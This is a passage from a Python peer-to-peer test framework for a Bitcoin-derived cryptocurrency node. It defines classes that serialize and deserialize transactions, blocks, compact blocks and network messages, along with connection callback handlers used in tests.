r += ser_uint256_vector(self.vHave)
return r
def __repr__(self):
return "CBlockLocator(nVersion=%i vHave=%s)" \
% (self.nVersion, repr(self.vHave))
class COutPoint(object):
def __init__(self, hash=0, n=0):
self.hash = hash
self.n = n
def deserialize(self, f):
self.hash = deser_uint256(f)
self.n = struct.unpack("<I", f.read(4))[0]
def serialize(self):
r = b""
r += ser_uint256(self.hash)
r += struct.pack("<I", self.n)
return r
def __repr__(self):
return "COutPoint(hash=%064x n=%i)" % (self.hash, self.n)
class CTxIn(object):
def __init__(self, outpoint=None, scriptSig=b"", nSequence=0):
if outpoint is None:
self.prevout = COutPoint()
else:
self.prevout = outpoint
self.scriptSig = scriptSig
self.nSequence = nSequence
def deserialize(self, f):
self.prevout = COutPoint()
self.prevout.deserialize(f)
self.scriptSig = deser_string(f)
self.nSequence = struct.unpack("<I", f.read(4))[0]
def serialize(self):
r = b""
r += self.prevout.serialize()
r += ser_string(self.scriptSig)
r += struct.pack("<I", self.nSequence)
return r
def __repr__(self):
return "CTxIn(prevout=%s scriptSig=%s nSequence=%i)" \
% (repr(self.prevout), bytes_to_hex_str(self.scriptSig),
self.nSequence)
class CTxOut(object):
def __init__(self, nValue=0, scriptPubKey=b""):
self.nValue = nValue
self.scriptPubKey = scriptPubKey
def deserialize(self, f):
self.nValue = struct.unpack("<q", f.read(8))[0]
self.scriptPubKey = deser_string(f)
def serialize(self):
r = b""
r += struct.pack("<q", self.nValue)
r += ser_string(self.scriptPubKey)
return r
def __repr__(self):
return "CTxOut(nValue=%i.%08i scriptPubKey=%s)" \
% (self.nValue // COIN, self.nValue % COIN,
bytes_to_hex_str(self.scriptPubKey))
class CScriptWitness(object):
def __init__(self):
# stack is a vector of strings
self.stack = []
def __repr__(self):
return "CScriptWitness(%s)" % \
(",".join([bytes_to_hex_str(x) for x in self.stack]))
def is_null(self):
if self.stack:
return False
return True
class CTxInWitness(object):
def __init__(self):
self.scriptWitness = CScriptWitness()
def deserialize(self, f):
self.scriptWitness.stack = deser_string_vector(f)
def serialize(self):
return ser_string_vector(self.scriptWitness.stack)
def __repr__(self):
return repr(self.scriptWitness)
def is_null(self):
return self.scriptWitness.is_null()
class CTxWitness(object):
def __init__(self):
self.vtxinwit = []
def deserialize(self, f):
for i in range(len(self.vtxinwit)):
self.vtxinwit[i].deserialize(f)
def serialize(self):
r = b""
# This is different than the usual vector serialization --
# we omit the length of the vector, which is required to be
# the same length as the transaction's vin vector.
for x in self.vtxinwit:
r += x.serialize()
return r
def __repr__(self):
return "CTxWitness(%s)" % \
(';'.join([repr(x) for x in self.vtxinwit]))
def is_null(self):
for x in self.vtxinwit:
if not x.is_null():
return False
return True
class CTransaction(object):
def __init__(self, tx=None):
if tx is None:
self.nVersion = 1
self.vin = []
self.vout = []
self.wit = CTxWitness()
self.nLockTime = 0
self.sha256 = None
self.hash = None
else:
self.nVersion = tx.nVersion
self.vin = copy.deepcopy(tx.vin)
self.vout = copy.deepcopy(tx.vout)
self.nLockTime = tx.nLockTime
self.sha256 = tx.sha256
self.hash = tx.hash
self.wit = copy.deepcopy(tx.wit)
def deserialize(self, f):
self.nVersion = struct.unpack("<i", f.read(4))[0]
self.vin = deser_vector(f, CTxIn)
flags = 0
if len(self.vin) == 0:
flags = struct.unpack("<B", f.read(1))[0]
# Not sure why flags can't be zero, but this
# matches the implementation in kredsd
if (flags != 0):
self.vin = deser_vector(f, CTxIn)
self.vout = deser_vector(f, CTxOut)
else:
self.vout = deser_vector(f, CTxOut)
if flags != 0:
self.wit.vtxinwit = [CTxInWitness() for i in range(len(self.vin))]
self.wit.deserialize(f)
self.nLockTime = struct.unpack("<I", f.read(4))[0]
self.sha256 = None
self.hash = None
def serialize_without_witness(self):
r = b""
r += struct.pack("<i", self.nVersion)
r += ser_vector(self.vin)
r += ser_vector(self.vout)
r += struct.pack("<I", self.nLockTime)
return r
# Only serialize with witness when explicitly called for
def serialize_with_witness(self):
flags = 0
if not self.wit.is_null():
flags |= 1
r = b""
r += struct.pack("<i", self.nVersion)
if flags:
dummy = []
r += ser_vector(dummy)
r += struct.pack("<B", flags)
r += ser_vector(self.vin)
r += ser_vector(self.vout)
if flags & 1:
if (len(self.wit.vtxinwit) != len(self.vin)):
# vtxinwit must have the same length as vin
self.wit.vtxinwit = self.wit.vtxinwit[:len(self.vin)]
for i in range(len(self.wit.vtxinwit), len(self.vin)):
self.wit.vtxinwit.append(CTxInWitness())
r += self.wit.serialize()
r += struct.pack("<I", self.nLockTime)
return r
# Regular serialization is without witness -- must explicitly
# call serialize_with_witness to include witness data.
def serialize(self):
return self.serialize_without_witness()
# Recalculate the txid (transaction hash without witness)
def rehash(self):
self.sha256 = None
self.calc_sha256()
# We will only cache the serialization without witness in
# self.sha256 and self.hash -- those are expected to be the txid.
def calc_sha256(self, with_witness=False):
if with_witness:
# Don't cache the result, just return it
return uint256_from_str(hash256(self.serialize_with_witness()))
if self.sha256 is None:
self.sha256 = uint256_from_str(hash256(self.serialize_without_witness()))
self.hash = encode(hash256(self.serialize())[::-1], 'hex_codec').decode('ascii')
def is_valid(self):
self.calc_sha256()
for tout in self.vout:
if tout.nValue < 0 or tout.nValue > 21000000 * COIN:
return False
return True
def __repr__(self):
return "CTransaction(nVersion=%i vin=%s vout=%s wit=%s nLockTime=%i)" \
% (self.nVersion, repr(self.vin), repr(self.vout), repr(self.wit), self.nLockTime)
class CBlockHeader(object):
def __init__(self, header=None):
if header is None:
self.set_null()
else:
self.nVersion = header.nVersion
self.hashPrevBlock = header.hashPrevBlock
self.hashMerkleRoot = header.hashMerkleRoot
self.nTime = header.nTime
self.nBits = header.nBits
self.nNonce = header.nNonce
self.sha256 = header.sha256
self.hash = header.hash
self.calc_sha256()
def set_null(self):
self.nVersion = 1
self.hashPrevBlock = 0
self.hashMerkleRoot = 0
self.nTime = 0
self.nBits = 0
self.nNonce = 0
self.sha256 = None
self.hash = None
def deserialize(self, f):
self.nVersion = struct.unpack("<i", f.read(4))[0]
self.hashPrevBlock = deser_uint256(f)
self.hashMerkleRoot = deser_uint256(f)
self.nTime = struct.unpack("<I", f.read(4))[0]
self.nBits = struct.unpack("<I", f.read(4))[0]
self.nNonce = struct.unpack("<I", f.read(4))[0]
self.sha256 = None
self.hash = None
def serialize(self):
r = b""
r += struct.pack("<i", self.nVersion)
r += ser_uint256(self.hashPrevBlock)
r += ser_uint256(self.hashMerkleRoot)
r += struct.pack("<I", self.nTime)
r += struct.pack("<I", self.nBits)
r += struct.pack("<I", self.nNonce)
return r
def calc_sha256(self):
if self.sha256 is None:
r = b""
r += struct.pack("<i", self.nVersion)
r += ser_uint256(self.hashPrevBlock)
r += ser_uint256(self.hashMerkleRoot)
r += struct.pack("<I", self.nTime)
r += struct.pack("<I", self.nBits)
r += struct.pack("<I", self.nNonce)
self.sha256 = uint256_from_str(hash256(r))
self.hash = encode(hash256(r)[::-1], 'hex_codec').decode('ascii')
def rehash(self):
self.sha256 = None
self.calc_sha256()
return self.sha256
def __repr__(self):
return "CBlockHeader(nVersion=%i hashPrevBlock=%064x hashMerkleRoot=%064x nTime=%s nBits=%08x nNonce=%08x)" \
% (self.nVersion, self.hashPrevBlock, self.hashMerkleRoot,
time.ctime(self.nTime), self.nBits, self.nNonce)
class CBlock(CBlockHeader):
def __init__(self, header=None):
super(CBlock, self).__init__(header)
self.vtx = []
def deserialize(self, f):
super(CBlock, self).deserialize(f)
self.vtx = deser_vector(f, CTransaction)
def serialize(self, with_witness=False):
r = b""
r += super(CBlock, self).serialize()
if with_witness:
r += ser_vector(self.vtx, "serialize_with_witness")
else:
r += ser_vector(self.vtx)
return r
# Calculate the merkle root given a vector of transaction hashes
def get_merkle_root(self, hashes):
while len(hashes) > 1:
newhashes = []
for i in range(0, len(hashes), 2):
i2 = min(i+1, len(hashes)-1)
newhashes.append(hash256(hashes[i] + hashes[i2]))
hashes = newhashes
return uint256_from_str(hashes[0])
def calc_merkle_root(self):
hashes = []
for tx in self.vtx:
tx.calc_sha256()
hashes.append(ser_uint256(tx.sha256))
return self.get_merkle_root(hashes)
def calc_witness_merkle_root(self):
# For witness root purposes, the hash of the
# coinbase, with witness, is defined to be 0...0
hashes = [ser_uint256(0)]
for tx in self.vtx[1:]:
# Calculate the hashes with witness data
hashes.append(ser_uint256(tx.calc_sha256(True)))
return self.get_merkle_root(hashes)
def is_valid(self):
self.calc_sha256()
target = uint256_from_compact(self.nBits)
if self.sha256 > target:
return False
for tx in self.vtx:
if not tx.is_valid():
return False
if self.calc_merkle_root() != self.hashMerkleRoot:
return False
return True
def solve(self):
self.rehash()
target = uint256_from_compact(self.nBits)
while self.sha256 > target:
self.nNonce += 1
self.rehash()
def __repr__(self):
return "CBlock(nVersion=%i hashPrevBlock=%064x hashMerkleRoot=%064x nTime=%s nBits=%08x nNonce=%08x vtx=%s)" \
% (self.nVersion, self.hashPrevBlock, self.hashMerkleRoot,
time.ctime(self.nTime), self.nBits, self.nNonce, repr(self.vtx))
class CUnsignedAlert(object):
def __init__(self):
self.nVersion = 1
self.nRelayUntil = 0
self.nExpiration = 0
self.nID = 0
self.nCancel = 0
self.setCancel = []
self.nMinVer = 0
self.nMaxVer = 0
self.setSubVer = []
self.nPriority = 0
self.strComment = b""
self.strStatusBar = b""
self.strReserved = b""
def deserialize(self, f):
self.nVersion = struct.unpack("<i", f.read(4))[0]
self.nRelayUntil = struct.unpack("<q", f.read(8))[0]
self.nExpiration = struct.unpack("<q", f.read(8))[0]
self.nID = struct.unpack("<i", f.read(4))[0]
self.nCancel = struct.unpack("<i", f.read(4))[0]
self.setCancel = deser_int_vector(f)
self.nMinVer = struct.unpack("<i", f.read(4))[0]
self.nMaxVer = struct.unpack("<i", f.read(4))[0]
self.setSubVer = deser_string_vector(f)
self.nPriority = struct.unpack("<i", f.read(4))[0]
self.strComment = deser_string(f)
self.strStatusBar = deser_string(f)
self.strReserved = deser_string(f)
def serialize(self):
r = b""
r += struct.pack("<i", self.nVersion)
r += struct.pack("<q", self.nRelayUntil)
r += struct.pack("<q", self.nExpiration)
r += struct.pack("<i", self.nID)
r += struct.pack("<i", self.nCancel)
r += ser_int_vector(self.setCancel)
r += struct.pack("<i", self.nMinVer)
r += struct.pack("<i", self.nMaxVer)
r += ser_string_vector(self.setSubVer)
r += struct.pack("<i", self.nPriority)
r += ser_string(self.strComment)
r += ser_string(self.strStatusBar)
r += ser_string(self.strReserved)
return r
def __repr__(self):
return "CUnsignedAlert(nVersion %d, nRelayUntil %d, nExpiration %d, nID %d, nCancel %d, nMinVer %d, nMaxVer %d, nPriority %d, strComment %s, strStatusBar %s, strReserved %s)" \
% (self.nVersion, self.nRelayUntil, self.nExpiration, self.nID,
self.nCancel, self.nMinVer, self.nMaxVer, self.nPriority,
self.strComment, self.strStatusBar, self.strReserved)
class CAlert(object):
def __init__(self):
self.vchMsg = b""
self.vchSig = b""
def deserialize(self, f):
self.vchMsg = deser_string(f)
self.vchSig = deser_string(f)
def serialize(self):
r = b""
r += ser_string(self.vchMsg)
r += ser_string(self.vchSig)
return r
def __repr__(self):
return "CAlert(vchMsg.sz %d, vchSig.sz %d)" \
% (len(self.vchMsg), len(self.vchSig))
class PrefilledTransaction(object):
def __init__(self, index=0, tx = None):
self.index = index
self.tx = tx
def deserialize(self, f):
self.index = deser_compact_size(f)
self.tx = CTransaction()
self.tx.deserialize(f)
def serialize(self, with_witness=False):
r = b""
r += ser_compact_size(self.index)
if with_witness:
r += self.tx.serialize_with_witness()
else:
r += self.tx.serialize_without_witness()
return r
def serialize_with_witness(self):
return self.serialize(with_witness=True)
def __repr__(self):
return "PrefilledTransaction(index=%d, tx=%s)" % (self.index, repr(self.tx))
# This is what we send on the wire, in a cmpctblock message.
class P2PHeaderAndShortIDs(object):
def __init__(self):
self.header = CBlockHeader()
self.nonce = 0
self.shortids_length = 0
self.shortids = []
self.prefilled_txn_length = 0
self.prefilled_txn = []
def deserialize(self, f):
self.header.deserialize(f)
self.nonce = struct.unpack("<Q", f.read(8))[0]
self.shortids_length = deser_compact_size(f)
for i in range(self.shortids_length):
# shortids are defined to be 6 bytes in the spec, so append
# two zero bytes and read it in as an 8-byte number
self.shortids.append(struct.unpack("<Q", f.read(6) + b'\x00\x00')[0])
self.prefilled_txn = deser_vector(f, PrefilledTransaction)
self.prefilled_txn_length = len(self.prefilled_txn)
# When using version 2 compact blocks, we must serialize with_witness.
def serialize(self, with_witness=False):
r = b""
r += self.header.serialize()
r += struct.pack("<Q", self.nonce)
r += ser_compact_size(self.shortids_length)
for x in self.shortids:
# We only want the first 6 bytes
r += struct.pack("<Q", x)[0:6]
if with_witness:
r += ser_vector(self.prefilled_txn, "serialize_with_witness")
else:
r += ser_vector(self.prefilled_txn)
return r
def __repr__(self):
return "P2PHeaderAndShortIDs(header=%s, nonce=%d, shortids_length=%d, shortids=%s, prefilled_txn_length=%d, prefilledtxn=%s" % (repr(self.header), self.nonce, self.shortids_length, repr(self.shortids), self.prefilled_txn_length, repr(self.prefilled_txn))
# P2P version of the above that will use witness serialization (for compact
# block version 2)
class P2PHeaderAndShortWitnessIDs(P2PHeaderAndShortIDs):
def serialize(self):
return super(P2PHeaderAndShortWitnessIDs, self).serialize(with_witness=True)
# Calculate the BIP 152-compact blocks shortid for a given transaction hash
def calculate_shortid(k0, k1, tx_hash):
expected_shortid = siphash256(k0, k1, tx_hash)
expected_shortid &= 0x0000ffffffffffff
return expected_shortid
# This version gets rid of the array lengths, and reinterprets the differential
# encoding into indices that can be used for lookup.
class HeaderAndShortIDs(object):
def __init__(self, p2pheaders_and_shortids = None):
self.header = CBlockHeader()
self.nonce = 0
self.shortids = []
self.prefilled_txn = []
self.use_witness = False
if p2pheaders_and_shortids != None:
self.header = p2pheaders_and_shortids.header
self.nonce = p2pheaders_and_shortids.nonce
self.shortids = p2pheaders_and_shortids.shortids
last_index = -1
for x in p2pheaders_and_shortids.prefilled_txn:
self.prefilled_txn.append(PrefilledTransaction(x.index + last_index + 1, x.tx))
last_index = self.prefilled_txn[-1].index
def to_p2p(self):
if self.use_witness:
ret = P2PHeaderAndShortWitnessIDs()
else:
ret = P2PHeaderAndShortIDs()
ret.header = self.header
ret.nonce = self.nonce
ret.shortids_length = len(self.shortids)
ret.shortids = self.shortids
ret.prefilled_txn_length = len(self.prefilled_txn)
ret.prefilled_txn = []
last_index = -1
for x in self.prefilled_txn:
ret.prefilled_txn.append(PrefilledTransaction(x.index - last_index - 1, x.tx))
last_index = x.index
return ret
def get_siphash_keys(self):
header_nonce = self.header.serialize()
header_nonce += struct.pack("<Q", self.nonce)
hash_header_nonce_as_str = sha256(header_nonce)
key0 = struct.unpack("<Q", hash_header_nonce_as_str[0:8])[0]
key1 = struct.unpack("<Q", hash_header_nonce_as_str[8:16])[0]
return [ key0, key1 ]
# Version 2 compact blocks use wtxid in shortids (rather than txid)
def initialize_from_block(self, block, nonce=0, prefill_list = [0], use_witness = False):
self.header = CBlockHeader(block)
self.nonce = nonce
self.prefilled_txn = [ PrefilledTransaction(i, block.vtx[i]) for i in prefill_list ]
self.shortids = []
self.use_witness = use_witness
[k0, k1] = self.get_siphash_keys()
for i in range(len(block.vtx)):
if i not in prefill_list:
tx_hash = block.vtx[i].sha256
if use_witness:
tx_hash = block.vtx[i].calc_sha256(with_witness=True)
self.shortids.append(calculate_shortid(k0, k1, tx_hash))
def __repr__(self):
return "HeaderAndShortIDs(header=%s, nonce=%d, shortids=%s, prefilledtxn=%s" % (repr(self.header), self.nonce, repr(self.shortids), repr(self.prefilled_txn))
class BlockTransactionsRequest(object):
def __init__(self, blockhash=0, indexes = None):
self.blockhash = blockhash
self.indexes = indexes if indexes != None else []
def deserialize(self, f):
self.blockhash = deser_uint256(f)
indexes_length = deser_compact_size(f)
for i in range(indexes_length):
self.indexes.append(deser_compact_size(f))
def serialize(self):
r = b""
r += ser_uint256(self.blockhash)
r += ser_compact_size(len(self.indexes))
for x in self.indexes:
r += ser_compact_size(x)
return r
# helper to set the differentially encoded indexes from absolute ones
def from_absolute(self, absolute_indexes):
self.indexes = []
last_index = -1
for x in absolute_indexes:
self.indexes.append(x-last_index-1)
last_index = x
def to_absolute(self):
absolute_indexes = []
last_index = -1
for x in self.indexes:
absolute_indexes.append(x+last_index+1)
last_index = absolute_indexes[-1]
return absolute_indexes
def __repr__(self):
return "BlockTransactionsRequest(hash=%064x indexes=%s)" % (self.blockhash, repr(self.indexes))
class BlockTransactions(object):
def __init__(self, blockhash=0, transactions = None):
self.blockhash = blockhash
self.transactions = transactions if transactions != None else []
def deserialize(self, f):
self.blockhash = deser_uint256(f)
self.transactions = deser_vector(f, CTransaction)
def serialize(self, with_witness=False):
r = b""
r += ser_uint256(self.blockhash)
if with_witness:
r += ser_vector(self.transactions, "serialize_with_witness")
else:
r += ser_vector(self.transactions)
return r
def __repr__(self):
return "BlockTransactions(hash=%064x transactions=%s)" % (self.blockhash, repr(self.transactions))
# Objects that correspond to messages on the wire
class msg_version(object):
command = b"version"
def __init__(self):
self.nVersion = MY_VERSION
self.nServices = 1
self.nTime = int(time.time())
self.addrTo = CAddress()
self.addrFrom = CAddress()
self.nNonce = random.getrandbits(64)
self.strSubVer = MY_SUBVERSION
self.nStartingHeight = -1
self.nRelay = MY_RELAY
def deserialize(self, f):
self.nVersion = struct.unpack("<i", f.read(4))[0]
if self.nVersion == 10300:
self.nVersion = 300
self.nServices = struct.unpack("<Q", f.read(8))[0]
self.nTime = struct.unpack("<q", f.read(8))[0]
self.addrTo = CAddress()
self.addrTo.deserialize(f)
if self.nVersion >= 106:
self.addrFrom = CAddress()
self.addrFrom.deserialize(f)
self.nNonce = struct.unpack("<Q", f.read(8))[0]
self.strSubVer = deser_string(f)
else:
self.addrFrom = None
self.nNonce = None
self.strSubVer = None
self.nStartingHeight = None
if self.nVersion >= 209:
self.nStartingHeight = struct.unpack("<i", f.read(4))[0]
else:
self.nStartingHeight = None
if self.nVersion >= 70001:
# Relay field is optional for version 70001 onwards
try:
self.nRelay = struct.unpack("<b", f.read(1))[0]
except:
self.nRelay = 0
else:
self.nRelay = 0
def serialize(self):
r = b""
r += struct.pack("<i", self.nVersion)
r += struct.pack("<Q", self.nServices)
r += struct.pack("<q", self.nTime)
r += self.addrTo.serialize()
r += self.addrFrom.serialize()
r += struct.pack("<Q", self.nNonce)
r += ser_string(self.strSubVer)
r += struct.pack("<i", self.nStartingHeight)
r += struct.pack("<b", self.nRelay)
return r
def __repr__(self):
return 'msg_version(nVersion=%i nServices=%i nTime=%s addrTo=%s addrFrom=%s nNonce=0x%016X strSubVer=%s nStartingHeight=%i nRelay=%i)' \
% (self.nVersion, self.nServices, time.ctime(self.nTime),
repr(self.addrTo), repr(self.addrFrom), self.nNonce,
self.strSubVer, self.nStartingHeight, self.nRelay)
class msg_verack(object):
command = b"verack"
def __init__(self):
pass
def deserialize(self, f):
pass
def serialize(self):
return b""
def __repr__(self):
return "msg_verack()"
class msg_addr(object):
command = b"addr"
def __init__(self):
self.addrs = []
def deserialize(self, f):
self.addrs = deser_vector(f, CAddress)
def serialize(self):
return ser_vector(self.addrs)
def __repr__(self):
return "msg_addr(addrs=%s)" % (repr(self.addrs))
class msg_alert(object):
command = b"alert"
def __init__(self):
self.alert = CAlert()
def deserialize(self, f):
self.alert = CAlert()
self.alert.deserialize(f)
def serialize(self):
r = b""
r += self.alert.serialize()
return r
def __repr__(self):
return "msg_alert(alert=%s)" % (repr(self.alert), )
class msg_inv(object):
command = b"inv"
def __init__(self, inv=None):
if inv is None:
self.inv = []
else:
self.inv = inv
def deserialize(self, f):
self.inv = deser_vector(f, CInv)
def serialize(self):
return ser_vector(self.inv)
def __repr__(self):
return "msg_inv(inv=%s)" % (repr(self.inv))
class msg_getdata(object):
command = b"getdata"
def __init__(self, inv=None):
self.inv = inv if inv != None else []
def deserialize(self, f):
self.inv = deser_vector(f, CInv)
def serialize(self):
return ser_vector(self.inv)
def __repr__(self):
return "msg_getdata(inv=%s)" % (repr(self.inv))
class msg_getblocks(object):
command = b"getblocks"
def __init__(self):
self.locator = CBlockLocator()
self.hashstop = 0
def deserialize(self, f):
self.locator = CBlockLocator()
self.locator.deserialize(f)
self.hashstop = deser_uint256(f)
def serialize(self):
r = b""
r += self.locator.serialize()
r += ser_uint256(self.hashstop)
return r
def __repr__(self):
return "msg_getblocks(locator=%s hashstop=%064x)" \
% (repr(self.locator), self.hashstop)
class msg_tx(object):
command = b"tx"
def __init__(self, tx=CTransaction()):
self.tx = tx
def deserialize(self, f):
self.tx.deserialize(f)
def serialize(self):
return self.tx.serialize_without_witness()
def __repr__(self):
return "msg_tx(tx=%s)" % (repr(self.tx))
class msg_witness_tx(msg_tx):
def serialize(self):
return self.tx.serialize_with_witness()
class msg_block(object):
command = b"block"
def __init__(self, block=None):
if block is None:
self.block = CBlock()
else:
self.block = block
def deserialize(self, f):
self.block.deserialize(f)
def serialize(self):
return self.block.serialize()
def __repr__(self):
return "msg_block(block=%s)" % (repr(self.block))
# for cases where a user needs tighter control over what is sent over the wire
# note that the user must supply the name of the command, and the data
class msg_generic(object):
def __init__(self, command, data=None):
self.command = command
self.data = data
def serialize(self):
return self.data
def __repr__(self):
return "msg_generic()"
class msg_witness_block(msg_block):
def serialize(self):
r = self.block.serialize(with_witness=True)
return r
class msg_getaddr(object):
command = b"getaddr"
def __init__(self):
pass
def deserialize(self, f):
pass
def serialize(self):
return b""
def __repr__(self):
return "msg_getaddr()"
class msg_ping_prebip31(object):
command = b"ping"
def __init__(self):
pass
def deserialize(self, f):
pass
def serialize(self):
return b""
def __repr__(self):
return "msg_ping() (pre-bip31)"
class msg_ping(object):
command = b"ping"
def __init__(self, nonce=0):
self.nonce = nonce
def deserialize(self, f):
self.nonce = struct.unpack("<Q", f.read(8))[0]
def serialize(self):
r = b""
r += struct.pack("<Q", self.nonce)
return r
def __repr__(self):
return "msg_ping(nonce=%08x)" % self.nonce
class msg_pong(object):
command = b"pong"
def __init__(self, nonce=0):
self.nonce = nonce
def deserialize(self, f):
self.nonce = struct.unpack("<Q", f.read(8))[0]
def serialize(self):
r = b""
r += struct.pack("<Q", self.nonce)
return r
def __repr__(self):
return "msg_pong(nonce=%08x)" % self.nonce
class msg_mempool(object):
command = b"mempool"
def __init__(self):
pass
def deserialize(self, f):
pass
def serialize(self):
return b""
def __repr__(self):
return "msg_mempool()"
class msg_sendheaders(object):
command = b"sendheaders"
def __init__(self):
pass
def deserialize(self, f):
pass
def serialize(self):
return b""
def __repr__(self):
return "msg_sendheaders()"
# getheaders message has
# number of entries
# vector of hashes
# hash_stop (hash of last desired block header, 0 to get as many as possible)
class msg_getheaders(object):
command = b"getheaders"
def __init__(self):
self.locator = CBlockLocator()
self.hashstop = 0
def deserialize(self, f):
self.locator = CBlockLocator()
self.locator.deserialize(f)
self.hashstop = deser_uint256(f)
def serialize(self):
r = b""
r += self.locator.serialize()
r += ser_uint256(self.hashstop)
return r
def __repr__(self):
return "msg_getheaders(locator=%s, stop=%064x)" \
% (repr(self.locator), self.hashstop)
# headers message has
# <count> <vector of block headers>
class msg_headers(object):
command = b"headers"
def __init__(self):
self.headers = []
def deserialize(self, f):
# comment in kredsd indicates these should be deserialized as blocks
blocks = deser_vector(f, CBlock)
for x in blocks:
self.headers.append(CBlockHeader(x))
def serialize(self):
blocks = [CBlock(x) for x in self.headers]
return ser_vector(blocks)
def __repr__(self):
return "msg_headers(headers=%s)" % repr(self.headers)
class msg_reject(object):
command = b"reject"
REJECT_MALFORMED = 1
def __init__(self):
self.message = b""
self.code = 0
self.reason = b""
self.data = 0
def deserialize(self, f):
self.message = deser_string(f)
self.code = struct.unpack("<B", f.read(1))[0]
self.reason = deser_string(f)
if (self.code != self.REJECT_MALFORMED and
(self.message == b"block" or self.message == b"tx")):
self.data = deser_uint256(f)
def serialize(self):
r = ser_string(self.message)
r += struct.pack("<B", self.code)
r += ser_string(self.reason)
if (self.code != self.REJECT_MALFORMED and
(self.message == b"block" or self.message == b"tx")):
r += ser_uint256(self.data)
return r
def __repr__(self):
return "msg_reject: %s %d %s [%064x]" \
% (self.message, self.code, self.reason, self.data)
# Helper function
def wait_until(predicate, *, attempts=float('inf'), timeout=float('inf')):
attempt = 0
elapsed = 0
while attempt < attempts and elapsed < timeout:
with mininode_lock:
if predicate():
return True
attempt += 1
elapsed += 0.05
time.sleep(0.05)
return False
class msg_feefilter(object):
command = b"feefilter"
def __init__(self, feerate=0):
self.feerate = feerate
def deserialize(self, f):
self.feerate = struct.unpack("<Q", f.read(8))[0]
def serialize(self):
r = b""
r += struct.pack("<Q", self.feerate)
return r
def __repr__(self):
return "msg_feefilter(feerate=%08x)" % self.feerate
class msg_sendcmpct(object):
command = b"sendcmpct"
def __init__(self):
self.announce = False
self.version = 1
def deserialize(self, f):
self.announce = struct.unpack("<?", f.read(1))[0]
self.version = struct.unpack("<Q", f.read(8))[0]
def serialize(self):
r = b""
r += struct.pack("<?", self.announce)
r += struct.pack("<Q", self.version)
return r
def __repr__(self):
return "msg_sendcmpct(announce=%s, version=%lu)" % (self.announce, self.version)
class msg_cmpctblock(object):
command = b"cmpctblock"
def __init__(self, header_and_shortids = None):
self.header_and_shortids = header_and_shortids
def deserialize(self, f):
self.header_and_shortids = P2PHeaderAndShortIDs()
self.header_and_shortids.deserialize(f)
def serialize(self):
r = b""
r += self.header_and_shortids.serialize()
return r
def __repr__(self):
return "msg_cmpctblock(HeaderAndShortIDs=%s)" % repr(self.header_and_shortids)
class msg_getblocktxn(object):
command = b"getblocktxn"
def __init__(self):
self.block_txn_request = None
def deserialize(self, f):
self.block_txn_request = BlockTransactionsRequest()
self.block_txn_request.deserialize(f)
def serialize(self):
r = b""
r += self.block_txn_request.serialize()
return r
def __repr__(self):
return "msg_getblocktxn(block_txn_request=%s)" % (repr(self.block_txn_request))
class msg_blocktxn(object):
command = b"blocktxn"
def __init__(self):
self.block_transactions = BlockTransactions()
def deserialize(self, f):
self.block_transactions.deserialize(f)
def serialize(self):
r = b""
r += self.block_transactions.serialize()
return r
def __repr__(self):
return "msg_blocktxn(block_transactions=%s)" % (repr(self.block_transactions))
class msg_witness_blocktxn(msg_blocktxn):
def serialize(self):
r = b""
r += self.block_transactions.serialize(with_witness=True)
return r
# This is what a callback should look like for NodeConn
# Reimplement the on_* functions to provide handling for events
class NodeConnCB(object):
def __init__(self):
self.verack_received = False
# deliver_sleep_time is helpful for debugging race conditions in p2p
# tests; it causes message delivery to sleep for the specified time
# before acquiring the global lock and delivering the next message.
self.deliver_sleep_time = None
# Remember the services our peer has advertised
self.peer_services = None
def set_deliver_sleep_time(self, value):
with mininode_lock:
self.deliver_sleep_time = value
def get_deliver_sleep_time(self):
with mininode_lock:
return self.deliver_sleep_time
# Spin until verack message is received from the node.
# Tests may want to use this as a signal that the test can begin.
# This can be called from the testing thread, so it needs to acquire the
# global lock.
def wait_for_verack(self):
while True:
with mininode_lock:
if self.verack_received:
return
time.sleep(0.05)
def deliver(self, conn, message):
deliver_sleep = self.get_deliver_sleep_time()
if deliver_sleep is not None:
time.sleep(deliver_sleep)
with mininode_lock:
try:
getattr(self, 'on_' + message.command.decode('ascii'))(conn, message)
except:
print("ERROR delivering %s (%s)" % (repr(message),
sys.exc_info()[0]))
def on_version(self, conn, message):
if message.nVersion >= 209:
conn.send_message(msg_verack())
conn.ver_send = min(MY_VERSION, message.nVersion)
if message.nVersion < 209:
conn.ver_recv = conn.ver_send
conn.nServices = message.nServices
def on_verack(self, conn, message):
conn.ver_recv = conn.ver_send
self.verack_received = True
def on_inv(self, conn, message):
want = msg_getdata()
for i in message.inv:
if i.type != 0:
want.inv.append(i)
if len(want.inv):
conn.send_message(want)
def on_addr(self, conn, message): pass
def on_alert(self, conn, message): pass
def on_getdata(self, conn, message): pass
def on_getblocks(self, conn, message): pass
def on_tx(self, conn, message): pass
def on_block(self, conn, message): pass
def on_getaddr(self, conn, message): pass
def on_headers(self, conn, message): pass
def on_getheaders(self, conn, message): pass
def on_ping(self, conn, message):
if conn.ver_send > BIP0031_VERSION:
conn.send_message(msg_pong(message.nonce))
def on_reject(self, conn, message): pass
def on_open(self, conn): pass
def on_close(self, conn): pass
def on_mempool(self, conn): pass
def on_pong(self, conn, message): pass
def on_feefilter(self, conn, message): pass
def on_sendheaders(self, conn, message): pass
def on_sendcmpct(self, conn, message): pass
def on_cmpctblock(self, conn, message): pass
def on_getblocktxn(self, conn, message): pass
def on_blocktxn(self, conn, message): pass
# More useful callbacks and functions for NodeConnCB's which have a single NodeConn
class SingleNodeConnCB(NodeConnCB):
def __init__(self):
NodeConnCB.__init__(self)
self.connection = None
self.ping_counter = 1
self.last_pong = msg_pong()
def add_connection(self, conn):
self.connection = conn
# Wrapper for the NodeConn's send_message function
def send_message(self, message):
self.connection.send_message(message)
def send_and_ping(self, message):
self.send_message(message)
self.sync_with_ping()
def on_pong(self, conn, message):
self.last_pong = message
# Sync up with the node
def sync_with_ping(self, timeout=30):
def received_pong():
return (self.last_pong.nonce == self.ping_counter)
self.send_message(msg_ping(nonce=self.ping_counter))
success = wait_until(received_pong, timeout=timeout)
self.ping_counter += 1
return success
# The actual NodeConn class
# This class provides an interface for a p2p connection to a specified node
class NodeConn(asyncore.dispatcher):
messagemap = {
b"version": msg_version,
b"verack": msg_verack,
b"addr": msg_addr,
b"alert": msg_alert,
b"inv": msg_inv,
b"getdata": msg_getdata,
b"getblocks": msg_getblocks,
b"tx": msg_tx,
b"block": msg_block,
b"getaddr": msg_getaddr,
b"ping": msg_ping,
b"pong": msg_pong,
b"headers": msg_headers,
b"getheaders": msg_getheaders,
b"reject": msg_reject,
b"mempool": msg_mempool,
b"feefilter": msg_feefilter,
b"sendheaders": msg_sendheaders,
